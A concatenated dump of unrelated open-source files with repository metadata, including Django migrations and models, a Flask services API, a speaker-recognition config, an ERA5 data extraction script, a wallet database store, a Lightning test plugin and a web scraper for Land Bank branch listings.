                # If 'prefetch_related' has been applied to a queryset, we need to
                # forcibly invalidate the prefetch cache on the instance.
                instance._prefetched_objects_cache = {}
        return Response(serializer.data)
|
[
"977983452@qq.com"
] |
977983452@qq.com
|
c334f9d5fe148729774e785a96feae949de4f060
|
5e48f770f975ea0ae166cd662576baa36150cb41
|
/booking/migrations/0002_auto_20170725_2313.py
|
c1abc8a5cb7e36b285b6bc51fe62541f7d726ae7
|
[] |
no_license
|
Ngahu/Booking
|
df5a7b2e346bf497bc340e4ee3e6e7184c40d235
|
3187bb4a34225364181f0409344457c43f20b338
|
refs/heads/master
| 2021-01-01T19:54:20.069252
| 2017-07-29T08:25:32
| 2017-07-29T08:25:32
| 98,717,395
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 449
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.3 on 2017-07-25 23:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Give Book.travelling_persons a default of 1."""

    dependencies = [
        ('booking', '0001_initial'),
    ]
    operations = [
        migrations.AlterField(
            model_name='book',
            name='travelling_persons',
            field=models.IntegerField(default=1),
        ),
    ]
|
[
"jamaalaraheem@gmail.com"
] |
jamaalaraheem@gmail.com
|
9ed940e62e4b3bfdf9750564804b04975687106f
|
73c01a3f052f8ef63890ec3c2e28403ad41e9a71
|
/td/models/driver.py
|
cd23468080d6a1f5b364dd8199d0b29945d90f9f
|
[] |
no_license
|
Jokey90/aho
|
4c007c65c819efb726a732a8f36067c5a0226100
|
8bcd41e9ef7d40f07499429f385d4fec590636f6
|
refs/heads/master
| 2020-03-21T22:28:36.395996
| 2018-06-29T09:25:05
| 2018-06-29T09:25:05
| 139,128,834
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,159
|
py
|
from django.db import models
class Driver(models.Model):
    """Driver record linked one-to-one with an Employee."""
    # NOTE(review): importing Employee inside the class body is unusual;
    # presumably done to avoid a circular import — confirm.
    from main.models import Employee
    class Meta:
        verbose_name = 'Водитель'
        verbose_name_plural = 'Водители'
    emp = models.OneToOneField(verbose_name='Сотрудник', to=Employee, blank=False, null=False)
    comment = models.CharField(verbose_name='Комментарий', blank=True, null=True, default='', max_length=255)
    # driving licence number; shadows the `license` builtin, but renaming
    # a model field would require a migration, so it is kept as-is
    license = models.CharField(verbose_name='Вод. удостоверение', blank=True, null=True, default='', max_length=100)
    license_date = models.DateField(verbose_name='Вод. удостоверение до', blank=False, null=False)
    phone = models.CharField(verbose_name='Телефон', blank=True, null=True, default='', max_length=100)
    active = models.BooleanField(verbose_name='Активен', blank=False, null=False, default=True)
    photo = models.FileField(verbose_name='Скан вод. удостоверения', blank=True, upload_to='scans/licenses/', null=True)
    def short_name(self):
        # Delegate to the linked employee's short name.
        return self.emp.short_name()
    def __str__(self):
        return self.emp.short_name()
|
[
"Kishkurno_AS@dsdf.cds.ru"
] |
Kishkurno_AS@dsdf.cds.ru
|
fffc65720d6f0a1225f7ffb51fb0f9b5c0ebfc98
|
7ac223c9aaa46b2533e08928354f72dd03873e64
|
/rentals/migrations/0001_initial.py
|
47ae12267ae8e66afa4ec9c23d0eea29018c24b3
|
[] |
no_license
|
Kyeza/RentalMangementSystem
|
9f6e75ffe634510755dbe78fe74f4ef270b5bef5
|
862490d4be6683e40b81384eb4b7dadad35019cc
|
refs/heads/master
| 2023-04-30T06:20:11.281096
| 2019-05-23T20:40:29
| 2019-05-23T20:40:29
| 188,166,783
| 1
| 0
| null | 2023-04-21T20:31:55
| 2019-05-23T05:24:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,426
|
py
|
# Generated by Django 2.2.1 on 2019-05-23 09:53
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial rentals schema: Category and Property models."""

    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Category',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100, null=True)),
            ],
        ),
        migrations.CreateModel(
            name='Property',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=100, null=True)),
                ('image', models.ImageField(default='img_default.png', upload_to='property_imgs')),
                ('description', models.TextField(blank=True, null=True)),
                ('address', models.CharField(blank=True, max_length=150, null=True)),
                ('price', models.DecimalField(decimal_places=2, max_digits=12, null=True)),
                ('date_listed', models.DateTimeField(default=django.utils.timezone.now)),
                # Category is optional; deleting a Category orphans its
                # properties (SET_NULL) rather than deleting them.
                ('category', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='rentals.Category')),
            ],
        ),
    ]
|
[
"kyezaarnold63@gmail.com"
] |
kyezaarnold63@gmail.com
|
5ef05dd99cd88c1d6387005f2eb546494a1bd520
|
fdc2fbb1b9e75a6ce5adacec29aae7482c999135
|
/_api/public_api/services/routes.py
|
f90cad4b74402610f779b7f832b7fd98866cebad
|
[
"MIT"
] |
permissive
|
bellyfat/membership_and_affiliate_api
|
b37411a1244fc7d6bf721b6d36ec87b57845169f
|
41fb9f5a0c37c1ac5636122c61e98ddaf9c569ff
|
refs/heads/master
| 2023-07-12T17:07:28.399407
| 2021-08-24T13:04:02
| 2021-08-24T13:04:02
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,532
|
py
|
"""
**Public facing Services API**
"""
__author__ = "mobius-crypt"
__email__ = "mobiusndou@gmail.com"
__twitter__ = "@blueitserver"
__github_repo__ = "https://github.com/freelancing-solutions/memberships-and-affiliate-api"
__github_profile__ = "https://github.com/freelancing-solutions/"
from typing import Optional
from flask import Blueprint, request, current_app
from config.exceptions import if_bad_request_raise, UnAuthenticatedError, error_codes
from security.api_authenticator import handle_api_auth
from views.services import ServicesView
# Blueprint collecting the public, authenticated service endpoints.
services_public_api_bp = Blueprint('services_public_api', __name__)
@services_public_api_bp.route('/api/v1/public/service/<string:org_id>/<string:service_id>', methods=["GET"])
@handle_api_auth
def get_services(org_id: str, service_id: str) -> tuple:
    """
    **public_services_api**
        returns a single service scoped by organization id and service id
    :param org_id: organization id taken from the URL path
    :param service_id: service id taken from the URL path
    :return: response tuple produced by ServicesView.get_service
    """
    service_view: ServicesView = ServicesView()
    return service_view.get_service(service_id=service_id, organization_id=org_id)
@services_public_api_bp.route('/api/v1/public/services/<string:org_id>', methods=["GET"])
@handle_api_auth
def get_all_services(org_id: str) -> tuple:
    """
    **public_services_api**
        returns every service belonging to the given organization
    :param org_id: organization id taken from the URL path
    :return: response tuple produced by ServicesView.return_services
    """
    service_view: ServicesView = ServicesView()
    return service_view.return_services(organization_id=org_id)
|
[
"mobiusndou@gmail.com"
] |
mobiusndou@gmail.com
|
ffcf8c9e3bd602c62149a42dac33d47fc5c7fa0a
|
4dd695521343d56ff943e8c1768343d7680714e3
|
/experiments/scripts_auto_closedset_braccent/config_iVector_400_fold1.py
|
34cd51f887e4c284adc8d7e44663401d7056f6b5
|
[] |
no_license
|
natharb/environment
|
ea659ee541f6473e92b5b30c549e52b66f47b280
|
86e6cee6e01d2370abeb7c55a2c8a15001735919
|
refs/heads/master
| 2021-09-28T02:39:02.222966
| 2018-11-13T12:03:34
| 2018-11-13T12:03:34
| 139,762,646
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,317
|
py
|
#!/usr/bin/env python
# vim: set fileencoding=utf-8 :
#Nathália Alves Rocha Batista (nathbapt@decom.fee.unicamp.br)
import sys
sys.path.insert(0, '.')
import bob.bio.spear
import bob.bio.gmm
import numpy
import scipy.spatial
# Output locations for this fold's intermediate and final files.
temp_directory = './results/closedset_braccent/iVector/400/fold_1/temp/'
result_directory = './results/closedset_braccent/iVector/400/fold_1/results/'
sub_directory = 'subdirectory'
database = 'database_iVector_400_fold1.py'
groups = ['dev']
#groups = ['dev', 'eval']
# Voice activity detection based on a two-Gaussian energy model.
preprocessor = bob.bio.spear.preprocessor.Energy_2Gauss(max_iterations = 10, convergence_threshold = 0.0005, variance_threshold = 0.0005, win_length_ms = 20., win_shift_ms = 10., smoothing_window = 10)
# 19 MFCCs + energy, with delta and delta-delta coefficients.
extractor = bob.bio.spear.extractor.Cepstral(win_length_ms = 25, win_shift_ms = 10, n_filters = 24 , dct_norm = False, f_min = 0, f_max = 4000, delta_win = 2, mel_scale = True, with_energy = True, with_delta = True, with_delta_delta = True, n_ceps = 19, pre_emphasis_coef = 0.97)
# i-vector system: total-variability subspace of dimension 400 over a
# 256-Gaussian UBM, with whitening; LDA/WCCN/PLDA stages disabled.
algorithm = bob.bio.gmm.algorithm.IVector(subspace_dimension_of_t = 400, tv_training_iterations = 10, update_sigma = True, use_whitening = True, use_lda = False, use_wccn = False, use_plda = False, lda_dim = 50, plda_dim_F = 50, plda_dim_G = 50, plda_training_iterations = 50, number_of_gaussians = 256)
# Degree of grid parallelism and logging verbosity for the bob.bio run.
parallel = 40
verbose = 2
|
[
"nathbapt@decom.fee.unicamp.br"
] |
nathbapt@decom.fee.unicamp.br
|
da3449f427e0b24db486c59bdd24e486619c9e1f
|
117f066c80f3863ebef74463292bca6444f9758a
|
/data_pulling/tax/example.py
|
4fdcefef7f117c22146461f85385ac5b612cdb24
|
[] |
no_license
|
cottrell/notebooks
|
c6de3842cbaeb71457d270cbe6fabc8695a6ee1b
|
9eaf3d0500067fccb294d064ab78d7aaa03e8b4d
|
refs/heads/master
| 2023-08-09T22:41:01.996938
| 2023-08-04T22:41:51
| 2023-08-04T22:41:51
| 26,830,272
| 3
| 1
| null | 2023-03-04T03:58:03
| 2014-11-18T21:14:23
|
Python
|
UTF-8
|
Python
| false
| false
| 1,854
|
py
|
import pandas as pd
import numpy.random as nr
import numpy as np
class PandasPiecewiseLinear():
    """Piecewise-linear function stored as a pandas Series (index = x).

    Supports scalar multiplication, addition/subtraction of two curves
    spanning the same [min, max] x-range, and point evaluation.  No
    extrapolation is performed.
    """
    # dodgy, thing to do piecewise opt
    # this is not useful really, you would need to create some n-d simplex thing ... probably a package that does this
    def __init__(self, x, y):
        """Store the sample points; x must be strictly increasing (no extrap)."""
        self.data = pd.Series(y, index=x)
        assert np.diff(self.data.index.values).min() > 0
    def _reindexed_data(self, x):
        # Resample onto the grid *x*, filling new knots by linear interpolation.
        return self.data.reindex(x).interpolate(method='linear')
    def __mul__(self, other):
        # Scale the y-values (scalar, or anything pandas can broadcast).
        data = self.data * other
        return PandasPiecewiseLinear(data.index.values, data.values)
    def __add__(self, other):
        # Both curves must span the same x-range; merge their knot sets.
        a = self.data.index.values
        b = other.data.index.values
        assert a.min() == b.min()
        assert a.max() == b.max()
        x = np.unique(np.hstack([a, b]))
        x.sort()
        out = self._reindexed_data(x) + other._reindexed_data(x)
        return PandasPiecewiseLinear(out.index.values, out.values)
    def __call__(self, x):
        """Evaluate the curve at x (interp1d raises outside the sampled range)."""
        # Bug fix: `si` (scipy.interpolate) was never imported at module
        # level, so every evaluation raised NameError.
        import scipy.interpolate as si
        return si.interp1d(self.data.index.values, self.data.values)(x)
    def __sub__(self, other):
        return self.__add__(other * -1)
    def __repr__(self):
        # NOTE(review): printing inside __repr__ is a side effect; kept
        # for backward compatibility.
        print('PandasPiecewiseLinear')
        return self.data.__repr__()
    def argmax(self):
        """Return the x-value at which the curve attains its maximum."""
        return self.data.idxmax()
# test
# n = 5
# xa = sorted([0] + nr.rand(n).tolist() + [1])
# xb = sorted([0] + nr.rand(n).tolist() + [1])
# a = PandasPiecewiseLinear(xa, list(nr.randn(n + 2)))
# b = PandasPiecewiseLinear(xb, list(nr.randn(n + 2)))
# c = a + b
# c = a - b
# print(c)
# Build piecewise-linear curves from the project-local `do` module
# (presumably tax-schedule data; F/F_ni/G expose .x/.y sample points —
# TODO confirm against do.py).
import do
F = PandasPiecewiseLinear(do.F.x, do.F.y)
F_ni = PandasPiecewiseLinear(do.F_ni.x, do.F_ni.y)
G = PandasPiecewiseLinear(do.G.x, do.G.y)
# Combined curve plus two reference lines over [0, do._max_x].
F_ttl = F + F_ni
x0 = PandasPiecewiseLinear([0, do._max_x], [1, 1])
x1 = PandasPiecewiseLinear([0, do._max_x], [0, do._max_x])
|
[
"cottrell@users.noreply.github.com"
] |
cottrell@users.noreply.github.com
|
e75b8889a6c0498c6a7e72f280cba8ce56c72660
|
3249577773cf18e5c09ea36de62477ddb43b662b
|
/Python/django/user_login/apps/dojo_ninjas/views.py
|
6f0f71058c7279e806c4f9481c8dec2b16a697ee
|
[] |
no_license
|
HollinRoberts/code
|
5394abe2a7c42bbbe83d8f64a99c50a52f05792b
|
8026522ab169c4174037fdf1b271de60b75d79bf
|
refs/heads/master
| 2021-01-01T16:12:11.674680
| 2017-10-18T21:08:10
| 2017-10-18T21:08:10
| 97,786,418
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 190
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.shortcuts import render
def index(request):
    """Render the dojo_ninjas index page."""
    # NOTE: Python 2 print statement — this module targets Python 2.
    # The print looks like a leftover debug trace — TODO confirm/remove.
    print 'here'
    return render(request,'dojo_ninjas/index.html')
|
[
"hollinroberts@gmail.com"
] |
hollinroberts@gmail.com
|
41d999a5e04ca98fc1bea1f05e638bc5a92839e2
|
b891f38eb12eeafdbcec9deee2320acfaac3a7ad
|
/0x0A-python-inheritance/100-my_int.py
|
641a3669fbc5bd16550b3e3d1c87db16add73a55
|
[] |
no_license
|
davixcky/holbertonschool-higher_level_programming
|
bb112af3e18994a46584ac3e78385e46c3d918f6
|
fe4cd0e95ee976b93bd47c85c2bc810049f568fa
|
refs/heads/master
| 2023-01-11T00:41:03.145968
| 2020-09-22T22:55:53
| 2020-09-22T22:55:53
| 259,390,611
| 0
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 291
|
py
|
#!/usr/bin/python3
'''Module for advanced'''
class MyInt(int):
    '''Rebel integer: the == and != operators are swapped.

    Bug fix: the previous implementation compared object *identity*
    (``self is other``), so e.g. ``MyInt(3) != 5`` was True instead of
    the inverted value comparison (False, since ``3 == 5`` is False).
    Both operators now invert int's own value comparison.
    '''
    # Defining __eq__ would otherwise set __hash__ to None; keep int's.
    __hash__ = int.__hash__

    def __eq__(self, other):
        '''Override ==: behaves like int's != (value comparison).'''
        return super().__ne__(other)

    def __ne__(self, other):
        '''Override !=: behaves like int's == (value comparison).'''
        return super().__eq__(other)
|
[
"dvdizcky@gmail.com"
] |
dvdizcky@gmail.com
|
cade239b0ece789edff3420e5fd5b30a5452ddee
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/era5_scripts/01_netCDF_extraction/erafive902TG/134-tideGauge.py
|
5cfea7896c09776590870458447a906f23f3c666
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465
| 2021-06-25T21:00:44
| 2021-06-25T21:00:44
| 229,080,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,595
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 01 10:00:00 2020
ERA5 netCDF extraction script
@author: Michael Tadesse
"""
import time as tt
import os
import pandas as pd
from d_define_grid import Coordinate, findPixels, findindx
from c_read_netcdf import readnetcdf
from f_era5_subsetV2 import subsetter
def extract_data(delta= 1):
    """
    Master routine: for each predictor (slp, wnd_u, wnd_v) and each
    yearly netCDF file, subset the grid cells within *delta* degrees of
    the selected tide gauge(s) and save each subset as CSV.
    delta: distance (in degrees) from the tide gauge
    """
    print('Delta = {}'.format(delta), '\n')
    #defining the folders for predictors
    nc_path = {'slp' : "/lustre/fs0/home/mtadesse/era_five/slp",\
        "wnd_u": "/lustre/fs0/home/mtadesse/era_five/wnd_u",\
        'wnd_v' : "/lustre/fs0/home/mtadesse/era_five/wnd_v"}
    surge_path = "/lustre/fs0/home/mtadesse/obs_surge"
    csv_path = "/lustre/fs0/home/mtadesse/erafive_localized"
    #cd to the obs_surge dir to get TG information
    os.chdir(surge_path)
    # NOTE(review): os.listdir() order is platform-dependent; the x/y
    # index window below assumes a stable ordering — confirm upstream.
    tg_list = os.listdir()
    #################################
    #looping through the predictor folders
    #################################
    for pf in nc_path.keys():
        print(pf, '\n')
        os.chdir(nc_path[pf])
        ####################################
        #looping through the years of the chosen predictor
        ####################################
        for py in os.listdir():
            os.chdir(nc_path[pf]) #back to the predictor folder
            print(py, '\n')
            #get netcdf components - give predicor name and predictor file
            nc_file = readnetcdf(pf, py)
            lon, lat, time, pred = nc_file[0], nc_file[1], nc_file[2], \
                nc_file[3]
            # hard-coded tide-gauge index window: gauge 134 only
            x = 134
            y = 135
            #looping through individual tide gauges
            for t in range(x, y):
                #the name of the tide gauge - for saving purposes
                # tg = tg_list[t].split('.mat.mat.csv')[0]
                tg = tg_list[t]
                #extract lon and lat data from surge csv file
                print("tide gauge", tg, '\n')
                os.chdir(surge_path)
                # skip gauges whose surge file is empty
                if os.stat(tg).st_size == 0:
                    print('\n', "This tide gauge has no surge data!", '\n')
                    continue
                surge = pd.read_csv(tg, header = None)
                #surge_with_date = add_date(surge)
                #define tide gauge coordinate(lon, lat)
                tg_cord = Coordinate(float(surge.iloc[1,4]), float(surge.iloc[1,5]))
                print(tg_cord)
                #find closest grid points and their indices
                close_grids = findPixels(tg_cord, delta, lon, lat)
                ind_grids = findindx(close_grids, lon, lat)
                ind_grids.columns = ['lon', 'lat']
                #loop through preds#
                #subset predictor on selected grid size
                print("subsetting \n")
                pred_new = subsetter(pred, ind_grids, time)
                #create directories to save pred_new
                os.chdir(csv_path)
                #tide gauge directory
                tg_name = tg.split('.csv')[0]
                try:
                    os.makedirs(tg_name)
                    os.chdir(tg_name) #cd to it after creating it
                except FileExistsError:
                    #directory already exists
                    os.chdir(tg_name)
                #predictor directory
                pred_name = pf
                try:
                    os.makedirs(pred_name)
                    os.chdir(pred_name) #cd to it after creating it
                except FileExistsError:
                    #directory already exists
                    os.chdir(pred_name)
                #time for saving file
                print("saving as csv")
                yr_name = py.split('_')[-1]
                save_name = '_'.join([tg_name, pred_name, yr_name])\
                    + ".csv"
                pred_new.to_csv(save_name)
            #return to the predictor directory
            os.chdir(nc_path[pf])
#run script
extract_data(delta= 1)
|
[
"michaelg.tadesse@gmail.com"
] |
michaelg.tadesse@gmail.com
|
b31979f988725cf694bfbad19ec793def2e31147
|
88e8e28b58092d5ba051582930c156872b9565a5
|
/unews/unews/items.py
|
ecc7fba0c3ac1e5fd2ade006f035a54de44947d0
|
[] |
no_license
|
dorahero/crawlers
|
b8a4a1c2592e817b365d56a87bee021d29598810
|
88e134fdd2493330622848f931638aabd6c906fe
|
refs/heads/master
| 2023-02-19T07:54:54.945144
| 2021-01-23T09:13:42
| 2021-01-23T09:13:42
| 276,884,804
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 339
|
py
|
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class UnewsItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
title = scrapy.Field()
text = scrapy.Field()
time = scrapy.Field()
pass
|
[
"dorahero2727@gmail.com"
] |
dorahero2727@gmail.com
|
23c71b0d50b91315b570e7451f6325c9285a753a
|
021dcf39f7cfb303ff427d7344026004f9d4cfdd
|
/bookit/geo/models/area.py
|
a95118209730353550ebf7ebe4ccac7d64d64fed
|
[
"MIT"
] |
permissive
|
kamranhossain/bookit
|
dfaca266b93e0ee8a50e88a2a7702a6f5ece35f1
|
4189a0ed620d7a595de2c113bb3a2d435d66d5f0
|
refs/heads/master
| 2021-05-11T23:36:00.630917
| 2017-08-16T20:30:33
| 2017-08-16T20:30:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 164
|
py
|
from django.db import models
class Area(models.Model):
name = models.CharField(
max_length=140
)
def __str__(self):
return self.name
|
[
"aniruddha@adhikary.net"
] |
aniruddha@adhikary.net
|
d29d5c2be6de0c5ffb14a35773221396e731327d
|
627cca9406c31ce30c493ff7502f79eb4c57eee3
|
/xcha/wallet/wallet_user_store.py
|
599b6716d9fb71d4e7865a65ef4cc60d9f06933f
|
[
"Apache-2.0"
] |
permissive
|
blockchiansea/xcha-blockchain
|
40c6d36813f671e94316a522904238f495f39f6b
|
7de0ba89056236e30069aef12fe25843f6093bcf
|
refs/heads/master
| 2023-07-26T02:36:57.654196
| 2021-09-06T06:04:21
| 2021-09-06T06:04:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,788
|
py
|
from typing import List, Optional
import aiosqlite
from xcha.util.db_wrapper import DBWrapper
from xcha.util.ints import uint32
from xcha.wallet.util.wallet_types import WalletType
from xcha.wallet.wallet_info import WalletInfo
class WalletUserStore:
"""
WalletUserStore keeps track of all user created wallets and necessary smart-contract data
"""
db_connection: aiosqlite.Connection
cache_size: uint32
db_wrapper: DBWrapper
@classmethod
async def create(cls, db_wrapper: DBWrapper):
self = cls()
self.db_wrapper = db_wrapper
self.db_connection = db_wrapper.db
await self.db_connection.execute("pragma journal_mode=wal")
await self.db_connection.execute("pragma synchronous=2")
await self.db_connection.execute(
(
"CREATE TABLE IF NOT EXISTS users_wallets("
"id INTEGER PRIMARY KEY AUTOINCREMENT,"
" name text,"
" wallet_type int,"
" data text)"
)
)
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS name on users_wallets(name)")
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS type on users_wallets(wallet_type)")
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS data on users_wallets(data)")
await self.db_connection.commit()
await self.init_wallet()
return self
async def init_wallet(self):
all_wallets = await self.get_all_wallet_info_entries()
if len(all_wallets) == 0:
await self.create_wallet("Chia Wallet", WalletType.STANDARD_WALLET, "")
async def _clear_database(self):
cursor = await self.db_connection.execute("DELETE FROM users_wallets")
await cursor.close()
await self.db_connection.commit()
async def create_wallet(
self, name: str, wallet_type: int, data: str, id: Optional[int] = None, in_transaction=False
) -> Optional[WalletInfo]:
if not in_transaction:
await self.db_wrapper.lock.acquire()
try:
cursor = await self.db_connection.execute(
"INSERT INTO users_wallets VALUES(?, ?, ?, ?)",
(id, name, wallet_type, data),
)
await cursor.close()
finally:
if not in_transaction:
await self.db_connection.commit()
self.db_wrapper.lock.release()
return await self.get_last_wallet()
async def delete_wallet(self, id: int, in_transaction: bool):
if not in_transaction:
await self.db_wrapper.lock.acquire()
try:
cursor = await self.db_connection.execute(f"DELETE FROM users_wallets where id={id}")
await cursor.close()
finally:
if not in_transaction:
await self.db_connection.commit()
self.db_wrapper.lock.release()
async def update_wallet(self, wallet_info: WalletInfo, in_transaction):
if not in_transaction:
await self.db_wrapper.lock.acquire()
try:
cursor = await self.db_connection.execute(
"INSERT or REPLACE INTO users_wallets VALUES(?, ?, ?, ?)",
(
wallet_info.id,
wallet_info.name,
wallet_info.type,
wallet_info.data,
),
)
await cursor.close()
finally:
if not in_transaction:
await self.db_connection.commit()
self.db_wrapper.lock.release()
async def get_last_wallet(self) -> Optional[WalletInfo]:
cursor = await self.db_connection.execute("SELECT MAX(id) FROM users_wallets;")
row = await cursor.fetchone()
await cursor.close()
if row is None:
return None
return await self.get_wallet_by_id(row[0])
async def get_all_wallet_info_entries(self) -> List[WalletInfo]:
"""
Return a set containing all wallets
"""
cursor = await self.db_connection.execute("SELECT * from users_wallets")
rows = await cursor.fetchall()
await cursor.close()
result = []
for row in rows:
result.append(WalletInfo(row[0], row[1], row[2], row[3]))
return result
async def get_wallet_by_id(self, id: int) -> Optional[WalletInfo]:
"""
Return a wallet by id
"""
cursor = await self.db_connection.execute("SELECT * from users_wallets WHERE id=?", (id,))
row = await cursor.fetchone()
await cursor.close()
if row is None:
return None
return WalletInfo(row[0], row[1], row[2], row[3])
|
[
"xchanet@gmail.com"
] |
xchanet@gmail.com
|
5dc79f13f7a92a35dd46e4a129b04ec494cea9fc
|
ad13583673551857615498b9605d9dcab63bb2c3
|
/output/models/nist_data/atomic/id/schema_instance/nistschema_sv_iv_atomic_id_max_length_4_xsd/__init__.py
|
2ea09c36077f1939d69de901a715d7c02f4faea0
|
[
"MIT"
] |
permissive
|
tefra/xsdata-w3c-tests
|
397180205a735b06170aa188f1f39451d2089815
|
081d0908382a0e0b29c8ee9caca6f1c0e36dd6db
|
refs/heads/main
| 2023-08-03T04:25:37.841917
| 2023-07-29T17:10:13
| 2023-07-30T12:11:13
| 239,622,251
| 2
| 0
|
MIT
| 2023-07-25T14:19:04
| 2020-02-10T21:59:47
|
Python
|
UTF-8
|
Python
| false
| false
| 263
|
py
|
from output.models.nist_data.atomic.id.schema_instance.nistschema_sv_iv_atomic_id_max_length_4_xsd.nistschema_sv_iv_atomic_id_max_length_4 import (
NistschemaSvIvAtomicIdMaxLength4,
Out,
)
__all__ = [
"NistschemaSvIvAtomicIdMaxLength4",
"Out",
]
|
[
"tsoulloftas@gmail.com"
] |
tsoulloftas@gmail.com
|
ace1317e4d350f5245822cf11849f62bbcfe6a10
|
ae9f0a71576cf2d9f46f684ae412c741261c9ded
|
/tests/plugins/shortcircuit.py
|
8403b68ec141b5afb308aa44d94754063b583f46
|
[
"MIT"
] |
permissive
|
sugarchain-project/lightning
|
95adf492b2f5d3b4c20170b17a7e556b9b3abbd1
|
c73e21e099ca2f5ed02afae316f477e8a1fd1280
|
refs/heads/master
| 2020-08-05T17:02:38.936348
| 2019-10-04T08:56:23
| 2019-10-04T08:56:23
| 212,624,853
| 2
| 2
|
NOASSERTION
| 2019-10-03T16:20:19
| 2019-10-03T16:20:18
| null |
UTF-8
|
Python
| false
| false
| 231
|
py
|
#!/usr/bin/env python3
from lightning import Plugin
plugin = Plugin()
@plugin.hook("htlc_accepted")
def on_htlc_accepted(onion, htlc, plugin, **kwargs):
return {"result": "resolve", "payment_key": "00" * 32}
plugin.run()
|
[
"rusty@rustcorp.com.au"
] |
rusty@rustcorp.com.au
|
d8f90ee6ddf75cf52f82aca971d5e66cc8a69bad
|
3d19e1a316de4d6d96471c64332fff7acfaf1308
|
/Users/T/tlevine/landbank_branches.py
|
e7046f1be1fbea8d12176b46f65cc7ee7138faf7
|
[] |
no_license
|
BerilBBJ/scraperwiki-scraper-vault
|
4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc
|
65ea6a943cc348a9caf3782b900b36446f7e137d
|
refs/heads/master
| 2021-12-02T23:55:58.481210
| 2013-09-30T17:02:59
| 2013-09-30T17:02:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,898
|
py
|
from scraperwiki.sqlite import save
from scraperwiki import swimport
keyify=swimport('keyify').keyify
from lxml.html import fromstring
from urllib2 import urlopen
URL='http://www.landbank.co.za/contact/branches.php'
from time import time
strip_address = swimport('strip_address').strip_address
DATE=time()
def main():
blocks=get_blocks()
blockId=0
for block in blocks:
blockId+=1
block_info=block.data()
block_info['blockId']=blockId
block_info['date_scraped']=DATE
save([],block_info,'blocks')
for branch in block.branches():
branch_info=branch.data()
branch_info['blockId']=blockId
branch_info['date_scraped']=DATE
save([],branch_info,'branches')
def get_blocks():
x=fromstring(urlopen(URL).read())
blocks=x.xpath('//div[div[@class="float_info_left"]]')
return [Block(block) for block in blocks]
class Block:
def __init__(self,block):
self.block=block
def __str__(self):
title,person=self.header()
return title
def header(self):
title,person=self.block.xpath('preceding-sibling::strong[position()<=2]/text()')
return title,person
def region(self):
return self.block.xpath('preceding-sibling::div[div[@class="darker"]]/div/h3/text()')[-1]
def branch_names(self):
return self.block.xpath('descendant::strong/text()')
def data(self):
title,person=self.header()
return {
"blockName":title
, "blockPerson":person
, "region":self.region()
}
def branches(self):
b=[]
for branch_name in self.branch_names():
nodes=self.block.xpath('descendant::p[strong/text()="%s"]'%branch_name)
assert len(nodes)==1
b.append(Branch(nodes[0]))
return b
class Branch:
def __init__(self,p):
self.p=p
def __str__(self):
return self.name()
def name(self):
nodes=self.p.xpath('strong/text()')
assert 1==len(nodes)
return nodes[0]
def address(self):
return '\n'.join(self.p.xpath('text()'))
def phonecount(self):
return len(self.b_text())
def address_sans_phone(self):
return '\n'.join(self.p.xpath('text()')[0:-self.phonecount()])
def postcode(self):
return self.p.xpath('text()')[-self.phonecount()-1]
def town(self):
return self.p.xpath('text()')[-self.phonecount()-2]
def street_address(self):
return '\n'.join(self.p.xpath('text()')[0:-self.phonecount()-2])
def b_text(self):
return self.p.xpath('b/text()')
def phones(self):
numbers=self.p.xpath('text()')[-self.phonecount():]
return zip(self.b_text(),numbers)
def data(self):
d=dict([ (keyify(phone[0]),phone[1]) for phone in self.phones() ])
d.update({
"branchName":self.name()
, "address_raw":self.address()
, "town":strip_address(self.town())
, "address":strip_address(self.address_sans_phone())
, "street-address":strip_address(self.street_address())
, "postcode":strip_address(self.postcode())
})
return d
main()from scraperwiki.sqlite import save
from scraperwiki import swimport
keyify=swimport('keyify').keyify
from lxml.html import fromstring
from urllib2 import urlopen
URL='http://www.landbank.co.za/contact/branches.php'
from time import time
strip_address = swimport('strip_address').strip_address
DATE=time()
def main():
blocks=get_blocks()
blockId=0
for block in blocks:
blockId+=1
block_info=block.data()
block_info['blockId']=blockId
block_info['date_scraped']=DATE
save([],block_info,'blocks')
for branch in block.branches():
branch_info=branch.data()
branch_info['blockId']=blockId
branch_info['date_scraped']=DATE
save([],branch_info,'branches')
def get_blocks():
x=fromstring(urlopen(URL).read())
blocks=x.xpath('//div[div[@class="float_info_left"]]')
return [Block(block) for block in blocks]
class Block:
